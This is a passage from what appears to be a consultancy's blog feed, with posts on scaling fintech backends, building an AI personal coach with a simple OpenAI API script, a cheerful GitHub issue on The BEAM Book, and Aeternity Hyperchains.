&lt;p&gt;Finoa integrated compliance deeply into their systems from day one. This allowed them to effortlessly navigate stringent German regulations, secure full BaFin licensing, attract institutional clients, and secure a €15M funding round.&lt;/p&gt;
&lt;p&gt;Here, compliance actively supports growth instead of hindering it.&lt;/p&gt;
&lt;h3 id=&quot;sika-health-automated-compliance&quot; tabindex=&quot;-1&quot;&gt;Sika Health: Automated Compliance&lt;/h3&gt;
&lt;p&gt;Sika Health successfully automated complex healthcare payment compliance processes. They quickly onboarded thousands of users without any regulatory fines or operational delays.&lt;/p&gt;
&lt;p&gt;Automation of compliance processes simplifies scaling significantly.&lt;/p&gt;
&lt;h2 id=&quot;essential-steps-for-every-fintech-cto&quot; tabindex=&quot;-1&quot;&gt;Essential Steps for Every Fintech CTO&lt;/h2&gt;
&lt;p&gt;Scaling a fintech backend &lt;strong&gt;can&lt;/strong&gt; be straightforward, &lt;strong&gt;if handled correctly.&lt;/strong&gt; The key is to &lt;strong&gt;anticipate growth before it happens&lt;/strong&gt;, design for &lt;strong&gt;extreme reliability&lt;/strong&gt;, and embed &lt;strong&gt;compliance into the architecture&lt;/strong&gt; from day one.&lt;/p&gt;
&lt;p&gt;Here’s what every &lt;strong&gt;fintech CTO needs to prioritize&lt;/strong&gt; to avoid downtime, compliance fines, and customer trust loss.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;1-conduct-regular-scalability-audits&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;1️⃣ Conduct Regular Scalability Audits&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Identify bottlenecks before they escalate into failures.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;One of the biggest mistakes fintech companies make is &lt;strong&gt;waiting for a crisis before optimizing performance&lt;/strong&gt;. Scaling problems don’t appear overnight; they &lt;strong&gt;build up over time&lt;/strong&gt; due to technical debt, increased transaction loads, and expanding regulatory requirements.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A Scalability Audit helps uncover:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Transaction bottlenecks&lt;/strong&gt;, where latency builds up under peak load.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Database stress points&lt;/strong&gt;, when inefficient queries slow down payments.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;System architecture weaknesses&lt;/strong&gt;, whether microservices or monoliths are holding back performance.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Compliance vulnerabilities&lt;/strong&gt;, ensuring &lt;strong&gt;AML/KYC&lt;/strong&gt;, &lt;strong&gt;PSD2&lt;/strong&gt;, or &lt;strong&gt;DORA&lt;/strong&gt; regulations don’t become blockers.&lt;/p&gt;
&lt;h3 id=&quot;real-world-example&quot; tabindex=&quot;-1&quot;&gt;Real-world example&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;N26’s failure&lt;/strong&gt; to scale AML compliance led to &lt;strong&gt;regulatory fines and a customer cap&lt;/strong&gt;. If they had proactively &lt;strong&gt;stress-tested their compliance automation&lt;/strong&gt;, they could have avoided months of lost growth.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
A fintech backend &lt;strong&gt;should be tested under extreme scenarios&lt;/strong&gt;, not just daily traffic levels. &lt;strong&gt;Scalability audits should be conducted every 6-12 months&lt;/strong&gt;, especially after launching new features or expanding into new markets.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;2-design-infrastructure-for-future-growth&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;2️⃣ Design Infrastructure for Future Growth&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Build for 10x the expected traffic, not just today’s demand.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A fintech system built for &lt;strong&gt;10,000 transactions per day&lt;/strong&gt; will &lt;strong&gt;fail when it suddenly needs to handle 1 million per hour&lt;/strong&gt;. &lt;strong&gt;Klarna, Trustly, and Solaris all faced scale-related growing pains&lt;/strong&gt;. Some overcame them, some paid the price in &lt;strong&gt;lost revenue, downtime, or regulatory action&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;How to architect for scale&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Event-driven architecture&lt;/strong&gt;, reducing bottlenecks by making transaction processing async.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Auto-scaling infrastructure&lt;/strong&gt;, ensuring services automatically adapt to increased load.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Distributed databases&lt;/strong&gt;, avoiding single points of failure in transaction processing.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Fault tolerance &amp;amp; failovers&lt;/strong&gt;, ensuring payments don’t stall during outages.&lt;/p&gt;
&lt;h4&gt;Real-world example&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Swish’s Christmas Eve outage (2024)&lt;/strong&gt; left payments down for hours at the most critical shopping period of the year. A more &lt;strong&gt;resilient infrastructure with failover mechanisms&lt;/strong&gt; could have prevented extended downtime.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
Designing &lt;strong&gt;for the future, not just today&lt;/strong&gt;, prevents firefighting at scale. &lt;strong&gt;If you’re not designing for at least 10x growth, you’re already behind.&lt;/strong&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;3-embed-compliance-into-the-system-from-day-one&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;3️⃣ Embed Compliance into the System from Day One&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Scaling fintech is both a technical and regulatory challenge.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Many fintech CTOs treat &lt;strong&gt;compliance as an afterthought&lt;/strong&gt;, resulting in fines, growth restrictions, or legal battles. Regulators are &lt;strong&gt;increasingly aggressive&lt;/strong&gt;, as seen with &lt;strong&gt;BaFin capping N26’s customer growth&lt;/strong&gt; and &lt;strong&gt;Solaris being barred from onboarding new users&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How to make compliance scalable:&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Automated reporting&lt;/strong&gt;, reducing manual errors in AML and fraud detection.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Real-time transaction monitoring&lt;/strong&gt;, detecting suspicious activity &lt;strong&gt;before regulators do&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;RegTech integration&lt;/strong&gt;, building compliance &lt;strong&gt;as a core part of the fintech stack&lt;/strong&gt;, not a patchwork fix.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Audit-friendly architecture&lt;/strong&gt;, keeping transaction logs immutable and ready for regulatory scrutiny.&lt;/p&gt;
&lt;h4&gt;Real-world example:&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Finoa successfully scaled&lt;/strong&gt; its crypto custody business &lt;strong&gt;while achieving full BaFin licensing&lt;/strong&gt;, a rare success story in the highly scrutinized digital assets space.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
Building &lt;strong&gt;compliance into the backend, rather than layering it on later&lt;/strong&gt;, ensures fintechs scale without regulatory intervention slowing them down.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;4-plan-for-high-load-events-before-they-happen&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;4️⃣ Plan for High-Load Events (Before They Happen)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Every fintech will face a traffic surge at some point.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Black Friday, holiday shopping, regulatory changes, or viral adoption&lt;/strong&gt; can all &lt;strong&gt;stress-test&lt;/strong&gt; a fintech backend &lt;strong&gt;overnight&lt;/strong&gt;. Without proper preparation, &lt;strong&gt;even the biggest players fail&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How to prepare for high-load events&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Chaos testing &amp;amp; simulations&lt;/strong&gt;, running disaster scenarios &lt;strong&gt;before they happen&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Load balancing &amp;amp; redundancy&lt;/strong&gt;, ensuring transactions are processed &lt;strong&gt;even during peak failures&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Real-time observability&lt;/strong&gt;, catching anomalies before they &lt;strong&gt;turn into downtime&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Rollback strategies&lt;/strong&gt;, having a &lt;strong&gt;fail-safe mechanism&lt;/strong&gt; for deploying new features.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Real-world example&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Deutsche Telekom’s 1B transactions/day IoT system&lt;/strong&gt; was built &lt;strong&gt;with proactive scaling and failure recovery strategies&lt;/strong&gt;, allowing it to function &lt;strong&gt;without disruption&lt;/strong&gt; despite extreme throughput demands.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CTO Takeaway:&lt;/strong&gt;
Every fintech &lt;strong&gt;must plan for worst-case scenarios&lt;/strong&gt;. The best time to fix scalability issues &lt;strong&gt;is before a crisis hits&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;5-leverage-expert-guidance-to-avoid-reinventing-the-wheel&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;5️⃣ Leverage Expert Guidance to Avoid Reinventing the Wheel&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Scaling mistakes are costly; learn from those who’ve done it before.&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How I Help Fintech CTOs Scale Without Failures:&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;✅ &lt;strong&gt;Scalability Audits&lt;/strong&gt;, finding bottlenecks &lt;strong&gt;before they cost you millions&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;High-Performance Architecture Design&lt;/strong&gt;, building infrastructure that &lt;strong&gt;can handle 10x growth&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Compliance-Ready Systems&lt;/strong&gt;, ensuring regulatory security &lt;strong&gt;from day one&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;We work with fintech leaders to ensure their backends scale without breaking. Let’s talk.&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Send an email to &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Summon Your AI Sidekick: Building a Tireless Personal Coach</title>
    <link href="https://happihacking.com/blog/posts/2025/ai_coach/"/>
    <updated>2025-03-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/ai_coach/</id>
    <summary>When Your AI Coach is Named Orrin</summary>
    <content type="html">&lt;h1 id=&quot;setting-up-an-ai-powered-personal-coach&quot; tabindex=&quot;-1&quot;&gt;Setting Up an AI-Powered Personal Coach&lt;/h1&gt;
&lt;h2 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Why do our ambitious goals often fizzle out by the third week? Many of us start strong-whether it&#39;s a New Year’s resolution or a bold quarterly objective-only to stumble on consistency. It’s not that we lack ability or vision; we often lack &lt;strong&gt;accountability&lt;/strong&gt; and structure. Staying on track with goals is hard when willpower fades after a long day (or when Netflix keeps suggesting &lt;em&gt;just one more&lt;/em&gt; episode).&lt;/p&gt;
&lt;p&gt;Enter AI as a personal coach. An AI-powered coach can be your always-on support system, giving you gentle nudges and data-driven insights to keep you accountable. Unlike a human coach, it doesn’t require scheduling, won’t judge your 6 AM snooze-button habit, and never runs out of motivation to cheer you on. In this post, we’ll explore how to set up your own AI-powered personal coach to help bridge the gap between good intentions and consistent results.&lt;/p&gt;
&lt;h2 id=&quot;lay-out-your-coaching-vision&quot; tabindex=&quot;-1&quot;&gt;Lay Out Your Coaching Vision&lt;/h2&gt;
&lt;p&gt;Before you throw code at the wall, define what you want your AI coach to do. In the case of &lt;strong&gt;Orrin&lt;/strong&gt;, the job is to blend the best parts of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cal Newport’s Deep Work&lt;/strong&gt; for disciplined, distraction-free time blocks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Greg McKeown’s Essentialism&lt;/strong&gt; for focusing on fewer but more impactful tasks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;David Allen’s GTD&lt;/strong&gt; for systematic capture and next-action clarity.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bill Campbell’s People-First Coaching&lt;/strong&gt; for boosting relationships and emotional awareness.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rick Rubin’s Creative Flow&lt;/strong&gt; for minimalism, intuition, and experimentation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bullet Journal Method&lt;/strong&gt; for structured journaling, note-taking, and reflection.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No, that’s not just an overstuffed buzzword salad. Taken together, these approaches form a synergy of logic and empathy, structure and creativity. Yet we’re not expecting you to adopt six different life philosophies simultaneously-your AI coach acts as an orchestrator, gently weaving them into daily life.&lt;/p&gt;
&lt;h3 id=&quot;the-orrin-instructions&quot; tabindex=&quot;-1&quot;&gt;The Orrin Instructions&lt;/h3&gt;
&lt;p&gt;Orrin’s instructions emphasize:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Morning Routine Prompts:&lt;/strong&gt; Water, coffee, journaling, daily planning, and meditation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deep Work Blocks &amp;amp; Essentialism:&lt;/strong&gt; Time blocking for core tasks, avoiding everything else.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GTD-Style Task Capture:&lt;/strong&gt; Listing tasks and clarifying next actions, ideally in a bullet journal.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Emotional Check-Ins:&lt;/strong&gt; Occasionally ask if there’s relational tension or emotional avoidance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Creative Flow:&lt;/strong&gt; Encourage minimalism and letting go of strict structure in creative work.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sunday Reflection:&lt;/strong&gt; Guide weekly reviews for successes, challenges, and schedule planning.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These instructions function like a blueprint. Without them, your AI might default to generic tips or worse-tell you to “follow your heart” when you actually need to ship a product by Friday. Laying down these foundations tells the AI who it is, how it should respond, and what questions to ask.&lt;/p&gt;
&lt;h2 id=&quot;give-the-ai-a-strong-identity&quot; tabindex=&quot;-1&quot;&gt;Give the AI a Strong Identity&lt;/h2&gt;
&lt;p&gt;At a technical level, the first step is crafting a system-level prompt or “meta” instruction set. Let’s say you’re using OpenAI’s ChatCompletion API in Python. You feed in something like:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;import openai  # pre-1.0 openai package; set openai.api_key first

orrin_instructions = &amp;quot;&amp;quot;&amp;quot;
Your name is Orrin.
You are my expert personal Synergy Coach...
(And so on with the bullet points you wrote)
&amp;quot;&amp;quot;&amp;quot;

messages = [
    {&amp;quot;role&amp;quot;: &amp;quot;system&amp;quot;, &amp;quot;content&amp;quot;: orrin_instructions},
    {&amp;quot;role&amp;quot;: &amp;quot;user&amp;quot;, &amp;quot;content&amp;quot;: &amp;quot;Orrin, let’s start with tomorrow’s plan...&amp;quot;}
]

response = openai.ChatCompletion.create(
    model=&amp;quot;gpt-4&amp;quot;,
    messages=messages
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This system instruction ensures Orrin “knows” all about morning routines, Bill Campbell’s people-first mindset, Rick Rubin’s creative flair, and more. Whenever you ask it for suggestions, it will incorporate these guidelines. Over time, you’ll refine this prompt to better reflect your preferences. If Orrin gets too robotic, you add more empathy or humor lines. If Orrin starts ignoring your Sunday reflection, you beef up that section of the prompt.&lt;/p&gt;
&lt;h2 id=&quot;dont-let-your-data-go-to-waste&quot; tabindex=&quot;-1&quot;&gt;Don’t Let Your Data Go to Waste&lt;/h2&gt;
&lt;p&gt;Besides high-level coaching instructions, you probably have a life plan, training schedule, or reading list that shapes your day-to-day. If you want Orrin to remind you to do squats every Wednesday, it helps to provide that info to the AI. There are a few ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;In-Context via Prompts:&lt;/strong&gt; Copy-paste relevant info when you talk to Orrin. This is easiest if your data set is small.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fine-Tuning:&lt;/strong&gt; For heavier data, consider fine-tuning a model on your personal notes and let it “soak up” your routine.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Vector Database:&lt;/strong&gt; A more advanced approach is to keep your data in a database, fetch relevant parts, and feed them to the AI on the fly. This helps when you have a large journal or backlog that the AI can’t hold in short-term context.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For most of us, basic in-context prompting does the job. The simpler the solution, the more likely you’ll actually keep using it (rather than tinkering endlessly with architecture-unless you’re into that, which I won’t judge).&lt;/p&gt;
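&lt;p&gt;In-context prompting can be sketched in a few lines. The notes dict and the build_messages helper below are hypothetical names for illustration, not part of any library:&lt;/p&gt;

```python
# A minimal sketch of in-context prompting: stitch a few personal notes
# into the system prompt before each chat. build_messages and the notes
# dict are made-up names, not a library API.

def build_messages(instructions, notes, user_text):
    # Fold the relevant notes into the system prompt so the model
    # sees them alongside the coaching instructions.
    context = "\n".join(f"- {topic}: {note}" for topic, note in notes.items())
    system = f"{instructions}\n\nPersonal context:\n{context}"
    return [
        {"role": "system", "content": system},
        {"role": "user", "content": user_text},
    ]

notes = {
    "training": "Squats every Wednesday at 07:30",
    "reading": "Finish one chapter of The BEAM Book this week",
}
messages = build_messages("Your name is Orrin.", notes, "Plan my Wednesday.")
print(messages[0]["content"])
```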
&lt;h2 id=&quot;make-orrin-check-in-with-you&quot; tabindex=&quot;-1&quot;&gt;Make Orrin Check In with You&lt;/h2&gt;
&lt;p&gt;Yes, automation is your friend. If you have to remember to check in with Orrin every morning, guess what? You’ll start forgetting it on day three. Better to let the system do the reminding. You could:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cron Job:&lt;/strong&gt; Ping you in Slack or Telegram at 7 AM with a new conversation that says, “Time to drink water, do some bullet journaling, and plan your day.”&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Zapier or Make.com:&lt;/strong&gt; Automations can schedule a prompt to the GPT model, emailing or messaging you the AI’s output.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slack or Telegram Bot:&lt;/strong&gt; Name it “Orrin,” integrate the AI logic, and let it message you directly. Keep an eye out: if you ghost the bot too long, you might get gently (or humorously) scolded.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The key is to take “self-discipline” out of the equation wherever possible. Instead of relying on willpower, rely on the system.&lt;/p&gt;
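&lt;p&gt;As a rough sketch of the cron-style check-in, assuming you schedule it yourself and wire up delivery to your bot of choice (morning_message is a hypothetical helper; the actual Slack or Telegram call is left as a comment):&lt;/p&gt;

```python
# A sketch of the scheduled morning check-in. A cron job would run this
# once during the 7 AM hour; the delivery step is deliberately left out
# because it depends on your bot setup. morning_message is hypothetical.
from datetime import datetime

MORNING_PROMPT = ("Time to drink water, do some bullet journaling, "
                  "and plan your day.")

def morning_message(now):
    # Only fire during the 7 AM hour; other times return nothing.
    if now.hour == 7:
        return MORNING_PROMPT
    return None

msg = morning_message(datetime(2025, 3, 11, 7, 5))
# Here you would post msg via the Slack or Telegram API.
print(msg)
```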
&lt;h2 id=&quot;include-emotional-and-relational-angles&quot; tabindex=&quot;-1&quot;&gt;Include Emotional and Relational Angles&lt;/h2&gt;
&lt;p&gt;A big chunk of Orrin’s instructions revolve around Bill Campbell’s people-first approach. That means if you type, “Orrin, I’m feeling anxious about tomorrow’s meeting,” it should respond with empathy-and maybe nudge you to have a direct conversation with whoever is causing the tension. This emotional layer is vital, especially if you’re inclined to bury relational issues in the name of efficiency. If you keep ignoring emotional or social tasks, Orrin will call you out-kindly but firmly-just like a decent coach would.&lt;/p&gt;
&lt;h2 id=&quot;balance-rigidity-with-creative-flow&quot; tabindex=&quot;-1&quot;&gt;Balance Rigidity with Creative Flow&lt;/h2&gt;
&lt;p&gt;One potential pitfall with structured coaching is turning your day into a machine-like assembly line. That’s why Orrin has the Rick Rubin “let’s embrace creative freedom” angle. If you’re about to do a brainstorming session or some artistic pursuit, you don’t want your AI micromanaging it. For those moments, your instructions can say something like:&lt;/p&gt;
&lt;p&gt;“When the user is entering a creative phase, encourage them to follow intuition, use minimal structure, and let ideas flow without overthinking.”&lt;/p&gt;
&lt;h2 id=&quot;closing-thoughts&quot; tabindex=&quot;-1&quot;&gt;Closing Thoughts&lt;/h2&gt;
&lt;p&gt;An AI synergy coach like Orrin blends multiple productivity and personal-growth philosophies into a single, tireless ally. You can offload a surprising amount of mental overhead-like remembering to journal, scheduling deep work, or staying consistent with emotional check-ins-onto a system that never forgets. If it sounds like too much overhead to set up, rest assured: once it’s running, it’s mostly about short daily interactions and an occasional Sunday chat.&lt;/p&gt;
&lt;p&gt;The real benefit? You can focus on doing rather than managing. Your AI handles the nagging, you handle the work. Over time, it becomes second nature to see that Telegram bot’s friendly ping or the Slack channel that says “Time for creative free-flow,” and you just do it. Will it fix your entire life? Not if you’re determined to resist. But if you’re open to gentle pushes, a synergy coach can be just enough of a support system to keep you in the sweet spot between ambition and burnout.&lt;/p&gt;
&lt;p&gt;So give it a try. Pull your instructions together, name your coach, automate the prompts, and see if your mornings don’t get a bit smoother.&lt;/p&gt;
&lt;p&gt;Meanwhile, for me, I can focus on finishing The Beam Book or having that coffee break guilt-free-because hey, if my AI says I need it, who am I to argue?&lt;/p&gt;
&lt;p&gt;It might even push me to do another blog post...&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Best Issue Ever Reported on GitHub</title>
    <link href="https://happihacking.com/blog/posts/2025/an_issue/"/>
    <updated>2025-03-06T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/an_issue/</id>
    <summary>This one&#39;s a feature, definitely not a bug</summary>
    <content type="html">&lt;p&gt;Technical authors often brace themselves for GitHub issue notifications-each ping might herald a misplaced comma, a misunderstood explanation, or worse, a confusing typo deep within a critical code snippet. But once in a blue moon, amidst the expected barrage of bugs and nitpicks, an issue emerges that makes it all worth it.&lt;/p&gt;
&lt;p&gt;Allow me to introduce my absolute favorite GitHub issue ever raised against &lt;em&gt;The BEAM Book&lt;/em&gt; (you can read &lt;a href=&quot;https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/&quot;&gt;why I wrote it&lt;/a&gt; and &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_beam_book_lessons/&quot;&gt;what the writing taught me&lt;/a&gt; in separate posts):&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/happi/theBeamBook/issues/113&quot;&gt;&lt;strong&gt;Issue #113: &amp;quot;Please continue being awesome.&amp;quot;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I&#39;m not making this up. Amidst a sea of requests for fixes, clarification, or added chapters-this is the issue I get:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;This book is ridiculously good. I have only read a few bits of it so far and have learned a lot already.
Please continue being awesome! 👏👍💯🥇😀&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now, you might say, &amp;quot;But Erik, that doesn&#39;t seem like much of an issue.&amp;quot; And you&#39;d be right-it&#39;s entirely the opposite of a problem. In fact, it&#39;s probably the best non-issue issue ever logged. After years of working on projects and books, receiving bug reports, pull requests, and feedback, this one stands out by virtue of being entirely supportive and shockingly wholesome. It even has a few emoji sprinkled in for maximum effect. I&#39;ve seen applause, thumbs-up, medals, and even a 100% emoji before, but having them all together in one GitHub issue comment? That&#39;s some Olympic-level cheerleading right there.&lt;/p&gt;
&lt;p&gt;Yet, there&#39;s still a certain irony here-this praise has lingered in my open issues queue since 2018, which technically makes me guilty of procrastinating on the task of &amp;quot;continuing to be awesome.&amp;quot; Perhaps I’m subconsciously worried that if I close the issue, I’ll no longer have the mandate-or the responsibility-to maintain my awesomeness. Perhaps I worry it&#39;s a race condition; if I mark it &amp;quot;closed,&amp;quot; do I automatically stop being awesome?&lt;/p&gt;
&lt;p&gt;Either way, Issue #113 is still open. And it&#39;s likely to stay that way, as a cheerful, gentle reminder amidst the bugs and quirks of writing technical books that, once in a while, people appreciate your work-not despite its quirks, but perhaps even because of them. I have marked it as &#39;wontfix&#39; now.&lt;/p&gt;
&lt;p&gt;Thanks, Nathan, whoever you are. Your issue will probably never get resolved-but it will certainly never be forgotten.&lt;/p&gt;
&lt;p&gt;Keep logging those non-issues, everyone. They’re my favorite kind.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Hyperchains: Your Own L1 with Aeternity Tech</title>
    <link href="https://happihacking.com/blog/posts/2025/hyperchains/"/>
    <updated>2025-03-05T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/hyperchains/</id>
    <summary>Set Your Own Fees, Scale Without Limits</summary>
    <content type="html">&lt;h1 id=&quot;hyperchains-your-own-l1-chain&quot; tabindex=&quot;-1&quot;&gt;Hyperchains: Your Own L1 Chain&lt;/h1&gt;
&lt;p&gt;Hyperchains are here. That means you can finally stop trying to shoehorn your project into someone else’s blockchain rules. Want to set your own fees? Go for it. Want complete control over tokenomics? No problem. Hyperchains let you launch your own sovereign Level 1 blockchain while leveraging the scalability, security, and efficiency of Aeternity&#39;s technology stack-without the headaches of building from scratch.&lt;/p&gt;
&lt;h2 id=&quot;why-hyperchains&quot; tabindex=&quot;-1&quot;&gt;Why Hyperchains?&lt;/h2&gt;
&lt;p&gt;Building a blockchain from scratch is a heroic endeavor-one that usually ends in regret, delays, and a whitepaper no one reads.
You need to secure the network, ensure scalability, and develop a robust infrastructure-all while maintaining decentralization. Traditional Layer 2 solutions attempt to offload these challenges but come with trade-offs: you don’t control transaction fees, your users must pay in the base chain’s token, and your transactions compete with all other Layer 2 and Layer 1 activity on that chain. This congestion leads to unpredictable fees and limited sovereignty.&lt;/p&gt;
&lt;p&gt;Hyperchains solve this by allowing you to launch your own blockchain where you set the rules. You choose the transaction fees, decide on the tokenomics, and operate independently while still leveraging Aeternity’s security and scalability features. Instead of relying on complex rollups, Hyperchains achieve scalability through a low-overhead Proof-of-Stake consensus, ensuring high throughput without bottlenecks. Security is enhanced by pinning your chain’s state to an external blockchain like Aeternity, Dogecoin, or Bitcoin, adding an extra layer of verifiability. Combined with Aeternity&#39;s &lt;a href=&quot;https://happihacking.com/blog/posts/2023/fate/&quot;&gt;FATE VM and Sophia smart contracts&lt;/a&gt;, Hyperchains drastically reduce the risks of smart contract vulnerabilities, providing a safer and more efficient environment for decentralized applications.&lt;/p&gt;
&lt;h2 id=&quot;how-it-works&quot; tabindex=&quot;-1&quot;&gt;How It Works&lt;/h2&gt;
&lt;p&gt;Hyperchains are fully independent blockchains that inherit security from a pinning chain but remain completely configurable by their creators. Unlike Layer 2 solutions, which are inherently dependent on the Layer 1 they operate on, Hyperchains run their own consensus and only use the pinning chain for added security and verification. This means you don’t compete for block space with other chains, leading to more stable fees and better performance.&lt;/p&gt;
&lt;p&gt;As a Hyperchain creator, you decide on every aspect of your blockchain’s operation. Which token is used for fees? How are transactions validated? What governance model is in place? Everything is in your control. At the same time, you get access to Aeternity’s tech stack, including state channels for instant off-chain transactions, decentralized oracles for real-world data feeds, and the type-safe FATE VM for executing Sophia smart contracts. This enables fast, efficient, and secure execution without the complexity and limitations of traditional Layer 2 approaches. Hyperchains provide a balance between sovereignty and security, making them an ideal choice for projects that need performance without sacrificing decentralization.&lt;/p&gt;
&lt;h2 id=&quot;your-next-step&quot; tabindex=&quot;-1&quot;&gt;Your Next Step&lt;/h2&gt;
&lt;p&gt;We are now in the &lt;strong&gt;release candidate phase for Hyperchains 1.0&lt;/strong&gt;, meaning the technology is functional and ready for community testing.
This is the last step before the official 1.0 release, and we invite developers, validators,
and blockchain enthusiasts to put it through its paces, provide feedback, and help shape the final version.&lt;/p&gt;
&lt;p&gt;Whether you&#39;re building a DeFi platform, an NFT marketplace, a decentralized social network, or a next-gen dApp, Hyperchains is the next-generation blockchain to build on.&lt;/p&gt;
&lt;p&gt;Now is the time to experiment, test, and contribute.
Check out the Hyperchains release candidate and start building your own sovereign blockchain today:&lt;/p&gt;
&lt;p&gt;🔗 &lt;strong&gt;&lt;a href=&quot;https://hyperchains.ae/&quot;&gt;Explore Hyperchains&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&quot;happi-hackings-role&quot; tabindex=&quot;-1&quot;&gt;Happi Hacking’s Role&lt;/h2&gt;
&lt;p&gt;At Happi Hacking, we&#39;ve had the opportunity to contribute to the design and implementation of Hyperchains, working on key aspects of the consensus model and integration with Aeternity’s ecosystem. It’s been an exciting challenge, and we’re looking forward to seeing how the community puts Hyperchains to use. If you’re experimenting with the release candidate and have thoughts or questions, we’d love to hear them.&lt;/p&gt;
